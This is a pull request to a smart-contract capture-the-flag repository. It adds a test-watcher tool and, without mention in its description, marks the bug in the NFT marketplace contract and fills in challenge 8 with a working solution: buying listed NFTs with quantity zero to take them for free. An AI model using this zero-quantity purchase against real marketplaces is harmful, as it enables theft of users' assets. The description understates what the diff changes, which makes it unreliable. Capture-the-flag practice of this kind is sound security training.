### PR TITLE
add watcher to expedite the testing and solving

### DIFF
--- a/contracts/nft-bonanza/BonanzaMarketplace.sol
+++ b/contracts/nft-bonanza/BonanzaMarketplace.sol
@@ -234,6 +234,7 @@ contract BonanzaMarketplace is Ownable, ReentrancyGuard {
         require(_msgSender() != _owner, "Cannot buy your own item");
 
         Listing memory listedItem = listings[_nftAddress][_tokenId][_owner];
+        // PROBLEM IS HERE
         require(listedItem.quantity >= _quantity, "not enough quantity");
 
         // Transfer NFT to buyer

--- a/hardhat.config.ts
+++ b/hardhat.config.ts
@@ -1,5 +1,6 @@
 import { HardhatUserConfig } from "hardhat/config";
 import "@nomicfoundation/hardhat-toolbox";
+import 'hardhat-watcher'
 
 const config: HardhatUserConfig = {
   networks: {
@@ -20,6 +21,13 @@ const config: HardhatUserConfig = {
   },
   mocha: {
     timeout: 300 * 1e3,
+  },
+  watcher: {
+    test: {
+      tasks: [{ command: 'test', params: { testFiles: ['{path}'] } }],
+      files: ['./test/**/*'],
+      verbose: true
+    }
   }
 };
 

--- a/package.json
+++ b/package.json
@@ -5,6 +5,10 @@
   "repository": "https://github.com/0xToshii/mr-steal-yo-crypto-ctf.git",
   "author": "0xToshii <94262432+0xToshii@users.noreply.github.com>",
   "license": "MIT",
+  "scripts": {
+    "test": "hardhat test",
+    "test:watch": "hardhat watch test"
+  },
   "dependencies": {
     "@openzeppelin/contracts": "^4.7.3",
     "@uniswap/v2-core": "1.0.1",
@@ -27,6 +31,7 @@
     "chai": "^4.2.0",
     "ethers": "^5.4.7",
     "hardhat-gas-reporter": "^1.0.8",
+    "hardhat-watcher": "^2.5.0",
     "solidity-coverage": "^0.8.0",
     "ts-node": ">=8.0.0",
     "typechain": "^8.1.0",

--- a/test/8-nft-bonanza.ts
+++ b/test/8-nft-bonanza.ts
@@ -64,9 +64,12 @@ before(async () => {
 });
 
 it("solves the challenge", async function () {
+  const nftAAddress = nftA.address;
+  const nftBAddress = nftB.address;
+  const adminAddress = await adminUser.getAddress();
 
-  // implement solution here
-
+  await bonanzaMarketplace.connect(attacker).buyItem(nftAAddress, 0, adminAddress, 0)
+  await bonanzaMarketplace.connect(attacker).buyItem(nftBAddress, 0, adminAddress, 0)
 });
 
 /// expected final state


### PR DESCRIPTION
It can help developers to watch the test while they are solving the challenges without running the test command repeatedly 